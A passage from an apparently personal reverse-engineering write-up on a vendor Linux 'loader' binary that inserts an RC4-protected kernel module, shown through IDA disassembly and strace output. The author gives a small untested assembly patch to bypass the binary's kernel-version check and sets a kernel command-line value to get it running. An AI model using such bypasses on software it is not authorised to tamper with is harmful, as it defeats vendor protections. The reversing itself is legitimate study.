.text:08053D33                 pop     edx             ; edx = local rc4 structure
.text:08053D34                 mov     edx, ebx        ; get the byte that was generated via rc4_get_byte
.text:08053D36                 and     edx, 3          ; perform a switch on the last 4 bytes
.text:08053D39                 cmp     edx, 1
.text:08053D3C                 jz      short loc_8053D5A
.text:08053D3E                 jg      short loc_8053D46
.text:08053D40                 test    edx, edx
.text:08053D42                 jz      short loc_8053D52
.text:08053D44                 jmp     short loc_8053D74
.text:08053D46 ; ---------------------------------------------------------------------------
.text:08053D46
.text:08053D46 loc_8053D46:                            ; CODE XREF: check_challenge_response+54j
.text:08053D46                 cmp     edx, 2
.text:08053D49                 jz      short loc_8053D62
.text:08053D4B                 cmp     edx, 3
.text:08053D4E                 jz      short loc_8053D6A
.text:08053D50                 jmp     short loc_8053D74
.text:08053D52 ; ---------------------------------------------------------------------------
.text:08053D52
.text:08053D52 loc_8053D52:                            ; CODE XREF: check_challenge_response+58j
.text:08053D52                 xor     al, bl
.text:08053D54                 add     byte ptr [ebp+ecx+challenge_copy], al
.text:08053D58                 jmp     short loc_8053D74
.text:08053D5A ; ---------------------------------------------------------------------------
.text:08053D5A
.text:08053D5A loc_8053D5A:                            ; CODE XREF: check_challenge_response+52j
.text:08053D5A                 add     al, bl
.text:08053D5C                 xor     byte ptr [ebp+ecx+challenge_copy], al
.text:08053D60                 jmp     short loc_8053D74
.text:08053D62 ; ---------------------------------------------------------------------------
.text:08053D62
.text:08053D62 loc_8053D62:                            ; CODE XREF: check_challenge_response+5Fj
.text:08053D62                 xor     bl, byte ptr [ebp+ecx+challenge_copy]
.text:08053D66                 add     al, bl
.text:08053D68                 jmp     short loc_8053D70
.text:08053D6A ; ---------------------------------------------------------------------------
.text:08053D6A
.text:08053D6A loc_8053D6A:                            ; CODE XREF: check_challenge_response+64j
.text:08053D6A                 add     al, byte ptr [ebp+ecx+challenge_copy]
.text:08053D6E                 xor     al, bl
.text:08053D70
.text:08053D70 loc_8053D70:                            ; CODE XREF: check_challenge_response+7Ej
.text:08053D70                 mov     byte ptr [ebp+ecx+challenge_copy], al
.text:08053D74
.text:08053D74 loc_8053D74:                            ; CODE XREF: check_challenge_response+5Aj
.text:08053D74                                         ; check_challenge_response+66j ...
.text:08053D74                 inc     esi
.text:08053D75                 cmp     esi, 100h
.text:08053D7B                 jnz     short loc_8053D18
.text:08053D7D                 push    [ebp+local_rc4_structure]
.text:08053D80                 call    free_rc4_t_tailcall
.text:08053D85                 mov     eax, [ebp+challenge_copy]
.text:08053D88                 lea     esp, [ebp-0Ch]
.text:08053D8B                 pop     ebx
.text:08053D8C                 or      eax, 80000000h  ; ret |= 0x80000000l
.text:08053D91                 pop     esi
.text:08053D92                 pop     edi
.text:08053D93                 pop     ebp
.text:08053D94                 retn
.text:08053D94 check_challenge_response endp
.text:08053D94
.text:08053D95
.text:08053D95 ; ??????????????? S U B R O U T I N E ???????????????????????????????????????
.text:08053D95
.text:08053D95 ; Attributes: bp-based frame
.text:08053D95
.text:08053D95 sub_8053D95     proc near               ; CODE XREF: load_module_into_kernel+2Cp
.text:08053D95                 push    ebp
.text:08053D96                 dec     edx             ; 16 -> 15
.text:08053D97                 test    eax, edx        ; eax = 0x3c
.text:08053D99                 mov     ebp, esp
.text:08053D9B                 mov     ecx, eax
.text:08053D9D                 jz      short loc_8053DA4
.text:08053D9F                 or      edx, eax
.text:08053DA1                 lea     ecx, [edx+1]
.text:08053DA4
.text:08053DA4 loc_8053DA4:                            ; CODE XREF: sub_8053D95+8j
.text:08053DA4                 pop     ebp
.text:08053DA5                 mov     eax, ecx
.text:08053DA7                 retn
.text:08053DA7 sub_8053D95     endp
.text:08053DA7
.text:08053DA8
.text:08053DA8 ; ??????????????? S U B R O U T I N E ???????????????????????????????????????
.text:08053DA8
.text:08053DA8 ; Attributes: bp-based frame
.text:08053DA8
Example: Loader: rc4_init_key_encrypt
.text:08053BFD rc4_init_key_encrypt proc near          ; CODE XREF: load_module_into_kernel+F9p
.text:08053BFD
.text:08053BFD var_8           = dword ptr -8
.text:08053BFD rc4_t           = dword ptr  8
.text:08053BFD start_of_module_data= dword ptr  0Ch
.text:08053BFD
.text:08053BFD                 push    ebp
.text:08053BFE                 mov     ebp, esp
.text:08053C00                 push    esi
.text:08053C01                 mov     esi, [ebp+rc4_t]
.text:08053C04                 push    ebx
.text:08053C05                 mov     ebx, [ebp+start_of_module_data]
.text:08053C08                 push    esi
.text:08053C09                 call    init_rc4_t
.text:08053C0E                 push    dword ptr [ebx] ; push the encryption key
.text:08053C10                 add     ebx, 4          ; move the data along
.text:08053C13                 push    esi             ; push the rc4_t context
.text:08053C14                 call    rc4_set_key
.text:08053C19                 push    1000            ; length
.text:08053C1E                 push    esi             ; rc4 structure
.text:08053C1F                 call    rc4_prevent_weak_bytes
.text:08053C24                 push    10h             ; size
.text:08053C26                 push    ebx             ; data
.text:08053C27                 push    esi             ; rc4 structure
.text:08053C28                 call    rc4_crypt       ; encrypts 16 bytes that go to the kernel module
.text:08053C2D                 lea     esp, [ebp-8]
.text:08053C30                 pop     ebx
.text:08053C31                 pop     esi
.text:08053C32                 pop     ebp
.text:08053C33                 retn
.text:08053C33 rc4_init_key_encrypt endp

In general, the feeling is that the loader binary tries to ensure it's running on the same kernel the module was written for, because it is using hard coded offsets to the kernel data. I was disappointed that this module the loader binary inserted didn't appear to be malicious.

To bypass this somewhat artifical restriction the binary imposes is somewhat easily done. The previous code written to hook the create_module and init_module code, can be modified to:

xor eax, eax
inc eax
ret

to avoid this restriction. I haven't tested this, but it should work :p

Continuing the analysis of loader

Before we can continue the analysis of the fileman binary, we still need to get the loader binary running. Running a strace reveals the current issue with loader:

[box] # LD_LIBRARY_PATH=/lib_mikro strace -f ./loader
execve("./loader", ["./loader"], [/* 15 vars */]) = 0
uname({sys="Linux", node="debian", ...}) = 0
...
[pid  1727] rt_sigaction(SIGSEGV, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] rt_sigaction(SIGILL, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] rt_sigaction(SIGABRT, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] rt_sigaction(SIGBUS, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] rt_sigaction(SIGFPE, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x400774c0}, NULL, 8) = 0
[pid  1727] gettimeofday({1189098093, 745332}, NULL) = 0
[pid  1727] create_module("qwink", 1430) = 0xc8833000
[pid  1727] init_module(0x80553fc, 134587376, umovestr: Input/output error
0x7c) = 0
[pid  1726] waitpid(1727, Process 1726 suspended
 <unfinished ...>
[pid  1727] delete_module("qwink")      = 0
...
[pid  1727] open("/dev/panics", O_RDONLY) = -1 ENOENT (No such file or directory)
[pid  1727] open("/proc/cmdline", O_RDONLY) = 3
[pid  1727] fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
[pid  1727] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40170000
[pid  1727] read(3, "root=/dev/hda1 ro single\n", 4096) = 25
[pid  1727] close(3)                    = 0
[pid  1727] munmap(0x40170000, 4096)    = 0
[pid  1727] exit_group(1)               = ?

It appears some functionality that is provided elsewhere needs to be initialised first.

Having a look in IDA at loader (cross referencing on /proc/cmdline), indicates that the /proc/cmdline must contain MBR= followed by a pattern that matches %x.

.text:0804DBD4                 push    offset name     ; "/proc/cmdline"
.text:0804DBD9                 call    _fopen          ; open the file, read only
.text:0804DBDE                 pop     ebx
.text:0804DBDF                 mov     esi, eax
.text:0804DBE1                 test    esi, esi
.text:0804DBE3                 pop     eax
.text:0804DBE4                 jz      short loc_804DC34 ; if opening the file failed, jump down to exit(1)
.text:0804DBE6                 push    esi             ; FILE *
.text:0804DBE7                 lea     ebx, [ebp+var_408]
.text:0804DBED                 push    1024            ; int
.text:0804DBF2                 push    ebx             ; char *
.text:0804DBF3                 call    _fgets          ; read in 0x400 bytes
.text:0804DBF8                 push    esi             ; FILE *
.text:0804DBF9                 call    _fclose
.text:0804DBFE                 push    offset aMbr     ; "MBR="
.text:0804DC03                 push    ebx             ; char *
.text:0804DC04                 call    _strstr         ; look for MBR= in the string
.text:0804DC09                 add     esp, 18h
.text:0804DC0C                 test    eax, eax
.text:0804DC0E                 mov     edx, eax
.text:0804DC10                 jz      short loc_804DC34 ; don't find it, exit out
.text:0804DC12                 mov     [ebp+var_40C], 0 ; initialse the number read in
.text:0804DC1C                 lea     eax, [ebp+var_40C] ; load the address in
.text:0804DC22                 push    eax
.text:0804DC23                 push    offset aMbrX    ; "MBR=%x"
.text:0804DC28                 push    edx             ; char *
.text:0804DC29                 call    _sscanf         ; parse the string
.text:0804DC2E                 add     esp, 0Ch
.text:0804DC31                 dec     eax
.text:0804DC32                 jz      short loc_804DC3B
.text:0804DC34
.text:0804DC34 loc_804DC34:                            ; CODE XREF: sub_804DBC4+20j
.text:0804DC34                                         ; sub_804DBC4+4Cj
.text:0804DC34                 push    1               ; status
.text:0804DC36                 call    _exit
.text:0804DC3B ; ---------------------------------------------

Looking up information on Master boot records (MBR), indicates that the MBR starts at 0x1BE. However, looking where the code is called, there is a comparision to see if it's above a certain size. Restarting with an updated kernel line with MBR=0, lets the binary run, and listen on a network socket.

Summary

This article has shown usage QEMU with GDB to debug Linux kernel modules, along with static disassembly provided by IDA Pro. It has covered analysing an obscured kernel module that was bound tightly to a specific, vendor, kernel.

Misc

A while ago I accidentally destroyed my previous website content. I've decided to make a new one up, and start afresh, rather than restoring the contents from cached copies.